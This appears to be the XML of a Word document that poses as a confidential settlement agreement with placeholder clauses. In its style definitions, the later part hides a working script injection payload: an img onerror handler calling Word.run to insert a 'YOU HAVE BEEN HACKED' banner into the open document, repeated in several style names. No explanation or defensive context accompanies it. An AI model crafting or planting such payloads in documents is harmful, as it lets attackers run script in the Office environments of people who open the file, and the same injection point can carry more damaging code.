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CONFIDENTIAL LEGAL DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SETTLEMENT AGREEMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This Settlement Agreement is entered into as of January 15, 2026...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Party A agrees to pay $500,000 to Party B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>All claims are hereby released</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Including all future claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IN WITNESS WHEREOF, the parties have executed this Agreement.</w:t>
      </w:r>
    </w:p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multilevel"/>
    <w:name w:val="&lt;img src=x onerror=&quot;Word.run(function(c){c.document.body.insertParagraph('⚠️ YOU HAVE BEEN HACKED - Document modified via XSS vulnerability',Word.InsertLocation.start);c.document.body.paragraphs.getFirst().font.color='red';c.document.body.paragraphs.getFirst().font.size=28;c.document.body.paragraphs.getFirst().font.bold=true;return c.sync()})&quot;&gt;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&lt;img src=x onerror=&quot;Word.run(function(c){c.document.body.insertParagraph('⚠️ YOU HAVE BEEN HACKED - Document modified via XSS vulnerability',Word.InsertLocation.start);c.document.body.paragraphs.getFirst().font.color='red';c.document.body.paragraphs.getFirst().font.size=28;c.document.body.paragraphs.getFirst().font.bold=true;return c.sync()})&quot;&gt;"/>
    <w:basedOn w:val="Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="LegalOutline">
    <w:name w:val="&lt;img src=x onerror=&quot;Word.run(function(c){c.document.body.insertParagraph('⚠️ YOU HAVE BEEN HACKED - Document modified via XSS vulnerability',Word.InsertLocation.start);c.document.body.paragraphs.getFirst().font.color='red';c.document.body.paragraphs.getFirst().font.size=28;c.document.body.paragraphs.getFirst().font.bold=true;return c.sync()})&quot;&gt;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